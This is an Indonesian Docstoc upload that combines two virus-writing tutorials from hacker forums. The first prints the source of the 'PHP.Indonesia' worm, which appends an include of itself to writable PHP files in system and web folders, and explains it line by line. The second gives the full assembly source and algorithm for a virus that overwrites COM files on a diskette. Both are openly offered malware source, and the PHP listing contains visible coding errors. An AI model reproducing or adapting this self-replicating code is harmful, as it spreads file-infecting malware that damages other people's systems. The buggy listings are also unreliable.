Docstoc

Cara Sederhana membuat virus PHP - DOC

Document Sample
Cara Sederhana membuat virus PHP - DOC Powered By Docstoc
					Cara Sederhana membuat virus PHP

         Membuat virus bisa dengan bahasa apa saja dan salah
         satunya adalah dengan bahasa PHP. Pada artikel ini akan kita
         lihat bagaimana virus PHP.Indonesia yang juga dikenal dengan
         nama I-Worm.PHP.Indonesia dibuat.



         OK,Sebelum saya di BOM...saya mau ngasih tau beberapa hal sbb
:

         1. Artikel ini ditujukan buat menambah pengetahuan IT kita
saja
         2. Saya dan penulis asli artikel ini (sevenC) tidak
         bertanggungjawab
           Jika ada lamer yang bertindak bodoh dengan menyebarkan
         skrip ini
         3. Judul asli artikel ini adalah "Simple technique how to
         write PHP virus"
         4. Artikel ini sebenarnya buatan sevenC (
         http://sevenc.vze.com )
           dan saya hanya menterjemahkannya kedalam bahasa
         indonesia,saya
           nanti akan mencantumkan kredit kepada sobat saya
         sevenC,karna
           saya udah buat artikel ini memakai versi indonesia.
         5. Skrip yang saya pake disini juga merupakan skrip virus
         "PHP.Indonesia"
           buatan sevenC dan udah terdeteksi Kaspersky nama
         "I-Worm.PHP.Indonesia"


         Ok...Kita mulai aja..!!
         Pertama2 gw kasih mentahan skrip PHP.Indonesia,nanti gw akan
         coba ngejelasin
         baris demi baris arti codenya.

         -------------------------------Code-------------------------------
         <?
         // #################################################
         // # PHP.Indonesia made for all Chicken looser ground the
         world #
         // # By sevenC / N0:7
                            #
         // # http://sevenc.vze.com
                            #
         // # sevenC_zone@yahoo.com
                      #
         // ##################################################
$jawa = "indonesia.php\n";
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
$kalimantan = $jawa . $sumatra;
echo $kalimantan;
$all = opendir('C:\Windows\');
$all1 = opendir('C:\My Documents\');
$all2 = opendir('C:\InetPub\wwwRoot\');
$all3 = $all && $all1 && $all2
while ($file = readdir($all3))
{
 $inf = true;
 $exe = false;
 if ( ($exe = strstr ($file, '.php')) || ($exe = strstr
($file, '.php2')) || ($exe = strstr ($file, '.php3')) )
       if ( is_file($file) && is_writeable($file) )
 {
  $new = fopen($file, "r");
  $look = fread($new, filesize($file));
  $yes = strstr ($look, 'indonesia.php');
  if (!$yes) $inf = false;
 }
 if ( ($inf=false) )
 {
  $new = fopen($file, "a");
  $fputs($new, "<!-- ");
  $fputs($new, "PHP.indonesia - ");
  $fputs($new, "By sevenC / N0:7, ");
  $fputs($new, "http://trax.to/sevenC, ");
              $fputs($new, "sevenC_Zone@yahoo.com, ");
  $fputs($new, "SECTORS UNDERGROUND TEAM (Indonesia)");
  $fputs($new, "--->");
  $fputs($new, "<?php ");
  $fputs($new, "include(\"");
  $fputs($new, __FILE__);
  $fputs($new, "\"); ");
  $fputs($new, "?>");
  return;
 }
}
closedir($all3);
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
?>
--------------------------------------eoc-----------------------
Udah.. liat..? Mau belajar ? yeah... Gw akan coba jelasin
baris per baris
code virus PHP.Indonesia,tapi kalu gw salah mohon dikoreksi
yah...!! :) maklum
gw belum setaraf sama sevenC,hehehe... :P
-------------------------------------begin----------------------
<?
* Loe pasti tau kalo PHP musti dimulai make tanda ini --> <?
buat ngunjukin
  browser kalo entu skrip PHP.
// ###############################################
// # PHP.Indonesia made for all Chicken looser ground the
world #
// # By sevenC / N0:7
             #
// # http://sevenc.vze.com
             #
// # sevenC_zone@yahoo.com
       #
// ###############################################
* Pertama loe musti tau kalo komentar dalam PHP harus dimulai
dengan karakter -->> //
  Jadi baris2 di atas engga akan di eksekusi karna cuman
komentar.
$jawa = "indonesia.php\n";
* Pemberian nama variabel harus dimulai dengan karakter $
* Menset variabel jawa sama dengan string "indonesia.php" dan
\n ntu ganti baris
* Setiap satu baris kalimat musti diakhiri dengan karakter
titik koma  ;
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
* Menset variabel sumatra sama dengan string "Wellcome to
Indonesian PHPlovers"
$kalimantan = $jawa . $sumatra;
* var kalimantan = var gabungan jawa dan var sumatra
echo $kalimantan;
* Menulis variabel kalimantan kedalam texttream
$all = opendir('C:\Windows\');
* var $all = membuka direktory windows

$all1 = opendir('C:\My Documents\');
* var $all1 = membuka direktory My Documents
$all2 = opendir('C:\InetPub\wwwRoot\');
* var $all2 = membuka directori wwwRoot
* karna saya rasa maksud sevenC membuka folder ini adalah
karna di PWS file-file PHP
* biasanya diletakan di direktori ini
$all3 = $all && $all1 && $all2
* $all3 = gabungan dari $all , $all1 dan $all3
while ($file = readdir($all3))
* Perulangan kita mulai ketika kita membaca isi direktori
{
* Inget dengan tanda ini..!!
 $inf = true;
* menSet var $inf sebagai variabel boolean = true
 $exe = false;
          * menSet var $exe sebagai variabel boolean = false
           if ( ($exe = strstr ($file, '.php')) || ($exe = strstr
          ($file, '.phtml')) || ($exe = strstr ($file, '.php3')) )
          * Lihatlah extensi2 file yang akan kita serang
(php,phtml,php3)
                 if ( is_file($file) && is_writeable($file) )
          * Mencek atribut2 file,jika kita diijinkan menulis lalu
           {
          * Skali lagi jangan lupa tanda ini
            $new = fopen($file, "r");
          * menSet $new = membuka file baru dengan atribut read only
          yang hanya bisa dibaca saja
            $look = fread($new, filesize($file));
          * menSet $look = membaca var $new dan ukuran dari file
            $yes = strstr ($look, 'indonesia.php');
          * menSet $yes = $look , indonesia.php

           if (!$yes) $inf = false;
          * Jika bukan var $yes maka var $inf bernilai salah
          }
          if ( ($inf=false) )
          * jika var $inf = salah kemudian
          {
           $new = fopen($file, "a");
          * menSet $new = membuka file ( variabel $file ) / file yang
          diinfeksi
           $fputs($new, "<!-- ");
          * tulis string "<!--" kedalam file tsb ($new)

            $fputs($new, "PHP.indonesia - ");
          * tulis string "PHP.indonesia - " kedalam file tsb ($new)
            $fputs($new, "By sevenC / N0:7, ");
          * tulis string "By sevenC / N0:7, " kedalam file tsb ($new)
            $fputs($new, "http://trax.to/sevenC, ");
          * tulis string "http://trax.to/sevenC, " kedalam file tsb
          ($new)
                      $fputs($new, "sevenC_Zone@yahoo.com, ");
          * tulis string "sevenC_Zone@yahoo.com, " kedalam file tsb
          ($new)
            $fputs($new, "SECTORS UNDERGROUND TEAM (Indonesia)");
          * tulis string tsb ($new) "SECTORS UNDERGROUND TEAM
          (Indonesia)" kedalam file tsb ($new)
            $fputs($new, "--->");
          * tulis string "--->" kedalam file tsb ($new)
            $fputs($new, "<?php ");
          * Tulis seluruh kode virus ini kedalam file tsb
            $fputs($new, "include(\"");
          * tulis string "include(\" kedalam file tsb ($new)
            $fputs($new, __FILE__);
          * Tulis juga seluruh kode / skrip asli dari file tsb
          $fputs($new, "\"); ");
        * Tulis "\" kedalam file tsb
          $fputs($new, "?>");
        * Tulis "?>" kedalam file tsb
          return;
        * Ulangi langkah-langkah diatas
         }
        }
        closedir($all3);
        * menutup semua direktori yang aktif tadi ($all3)
        // PHP.Indonesia made for all Chicken looser ground the world
        // By sevenC / N0:7
        * komentar om sevenC
        ?>
        * Nutup skrip virus PHP ini




        --------------------------------Selesai---------------------------
        Ok... mudah-mudahan loe semua ngerti apa yang gw tulis
        diatas,kalo kagak ? bodo amat :P
        Kredit buat :

        1. sevenC (http://trax.to/sevenC)
          Biarpun umurnya masih belasan tapi gw salut banget sama
        otaknya karna
          Gw udah banyak belajar dari artikelnya.greatz & Thankz
        man..!!
          kapan neh bisa ktemuan ??
        2. SECTORS (http://sectors.vze.com)
          Makasih buat semua anak2 sectors baik yang masih aktif
        maupun tidak di forum
          teruskan perjuangan kalian, jangan mau bangsa kita ditindas
        kebodohan.
          Bantai semua lamer yang ada di Forum.
        3. IVWA / Indonesian Virus Writer Association
        (http://www.geocities.com/ivwa_staff)
          Kapan neh peluncuran zine pertama ? gw udah gak sabar
        neh...!!
        4. semua anak2 yang pernah gw temuin di #sectors (woi channel
        jangan ditinggal molo..!!)
        saran dan kritik kirim ke stupy_man@yahoo.com
        stupy (ex member of sectors)

         stupy_man @ yahoo.com

Pemrograman Virus Komputer II

        Thursday, February 13, 2003- Jumlah Klik [3091] , Penulis :
Dr`Ponidi

Jasakom - Bila dibandingkan dengan virus bacthfile, yang
pernah kita bicarakan maka virus yang kita bahas sekarang ini
telah memiliki kelima kemampuan seperti apa yang telah saya
sampaikan terdahulu.


1. Pendahuluan

Virus komputer yang akan dibicarakan dibawah ini ditulis dalam
bahasa assembley.Bila dibandingkan dengan virus bacthfile,
yang pernah kita bicarakan maka virus yang kita bahas sekarang
ini telah memiliki kelima kemampuan seperti apa yang telah
saya sampaikan terdahulu.
Virus ini mampu mencari semua file COM yang ada pada disket,
serta memeriksanya apakah telah tertular atau belum.Bila
belum, maka virus akan menularinya.Routine manipulasi yang
dimiliki virus ini hanyalah berupa tampilan pesan :”File ini
telah tertular Virus komputer!” atau “Semua file COM pada
disket ini telah tertular virus komputer!!!”.
Berbeda dengan virus batchfile yang menghasilkan file baru dan
membutuhkan beberapa file untuk menjalankannya, maka virus
yang akan kita bahas ini nantinya dapat bekerja sendiri dan
tidak menghasilkan file baru, sehingga kemampuan
menyembunyikan diri dari virus ini lebih baik.
Seperti halnya virus batchfile, virus dibawah ini adalah
termasuk jenis virus yang menumpangi program yang
ditularinya.Dengan demikian virus ini bersifat merusak.

2. Algoritma

Algoritma yang digunakan adalah sbb:
1.cari file COM yang pertama
2.buka dan baca file tersebut, letakkan pada buffer (di RAM)
3.Dengan membandingkan tanda pengenal virus dan rangkaian byte
bagian awal dari program, periksa apakah file tersebut telah
tertular virus atau belum.
4.a) Bila belum, maka tulari file tersebut dengan jalan
menyalin seluruh program virus ke file tersebut
(menumpangi).Kemudian tampilkan pesan :”File ini telah
tertular Virus Komputer !”
b) Bila sudah, maka carilah file COM berikutnya.Ulangi langkah
2.
5.Jika semua file COM telah tertular, maka tampilkan pesan :
“semua file Com pada disket ini telah tertular virus
komputer!!!”


3. Program dan Mekanisme Penularan
Program dibawah ini merupakan implementasi dari bagian diatas.

Catatan : Program virus ini menggunakan instruksi
macro.Definisi macro yang digunakan terdapat pada file
LAMMER.MAC.(klo pengen liat file macronya kirim email ke
Dr`Ponidi@crackdealer.com)

;------------------------------------------------------------------------------
; LAMMER.ASM
;
;CODE BY : #DEFACE-TEAM@IRC.DAL.NET
; #DHEGLENG@IRC.DAL.NET
;
;RETRIEVAL SYSTEM BY: DR`PONIDI@CRACKDEALER.COM
;
;VIRUS INI MENYERANG DAN MERUSAK SEMUA FILE COM.
;BERHATI-HATILAH!
;------------------------------------------------------------------------------


     IF1
    INCLUDE LAMMER.MAC
    ENDIF
    Code_segSEGMENT
     ASSUME CS:Code_seg
    ORG 100h
    Mulai :jmp kerjakan
    IdentitasDB `File ini telah tertular virus komputer !$`
    PeringatanDB `semua file COM dalam disket ini telah
    tertular virus`
    DB `Komputer !!!$`
    File_COMDB`*.com`,0h
    Nama_fileDB 13 DUP(?)
    Panjang_idequ 45
    Panjang_virequ 445
    Atributequ 20h
    Open_codeequ 2
    Jumlahequ 0ffffh
    DTADB43 DUP(20h)

    Kerjakan :Set_DTA DTA
    Mov ax,0
    Find_first file_COM,Atribut
    Masih_adakah:cmp ax,0
    Je Laksanakan
    Cmp ax,2
    Je Keluar
    Tulis_string peringatan
    Jmp Keluar
   Keluar :Ke_dos
   Laksanakan :mov si,offset DTA + 30
   Pindahkan_string 13,nama_file
   Buka_file_DTA DTA,Open_code
   Push bx
   Baca_file bx,Buffer,jumlah
   Push ax
   Mov di,offset Buffer + 3
   Bandingkan-string Identitas,panjang_id
   Cmp bx,0
   Je Cari_lainnya
   Mov si,100h
   Pindahkan_string panjang_vir,Buffer
   Pop ax
   Pop bx
   Push ax
   Tutup_file bx
   Hapus_file Nama_file
   Buat_file Nama_file,Atribut
   Buka_file Nama_file,Open_code
   Pop ax
   Tulis_file bx,buffer,ax
   Tutup_file bx
   Tulis_string identitas
   Ke_dos

   Cari_lainnya :pop ax
   pop bx
   Tutup_file bx
   Find_next
   Jmp masih_adakah
   BufferLabel byte
   Code_segENDS
   END mulai



4. Penjelasan

Awal dari penularan dimulai ketika program virus ini
dijalankan pada disket yang berisi file-file COM.Virus
mula-mula akan menulari file COM yang pertama (berdasarkan
urutan file-file pada disket).Dengan penularan ini, maka file
tersebut menjadi sumber penularan baru, dan virus yang asli
dapat dihapus.File-file yang telah tertular ukurannya tidak
berubah.
Bila file yang telah tertular itu dijalankan, maka file itu
tidak dapat menjalankan fungsinya dan hanya akan menampilkan
pesan :”File ini telah tertular Virus komputer!”.Sebelumnya,
file tersebut akan menulari file COM lainnya.
Bila kebetulan file .COM pertama yang diserang didalam
directory utama adalah COMMAND.COM, maka setiap kali melakukan
boot dengan disket itu, tak akan pernah berhasil dan
sebelumnya virus akan menulari sebuah program COM lain yang
belum tertular.
Harap diperhatikan bahwa virus ini tidak dapat bekerja dengan
baik bila berada pada file COM yang ukurannya lebih kecil
daripada ukuran program virus yang asli, atau terlalu besar
(mendekati atau lebih dari FFFF heksadesimal = 64KB)
Ini disebabkan karena program virus tidak dapat disalin secara
lengkap atau buffer telah melampaui batas daerah CS (Code
Segment)




Demikianlah Artikel yang dapat saya sampaikan pada kesempatan
ini, Semoga informasi yang saya sampaikan dapat bermanfaat
bagi pengetahuan bagi kita semua ,khususnya bagi yang concern
terhadap virus.Sekian terima kasih cao……:) :) :)


   Author : Dr`Ponidi
   Dedication : For Knowledgement & Open Source
   Greetz : #DEFACE-TEAM@IRC.DAL.NET
          #DHEGLENG@IRC.DAL.NET

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:731
posted:2/19/2010
language:Indonesian
pages:9
Lingjuan Ma Lingjuan Ma MS
About work for China Compulsory Certification. Some of the documents come from Internet, if you hold the copyright please contact me by huangcaijin@sohu.com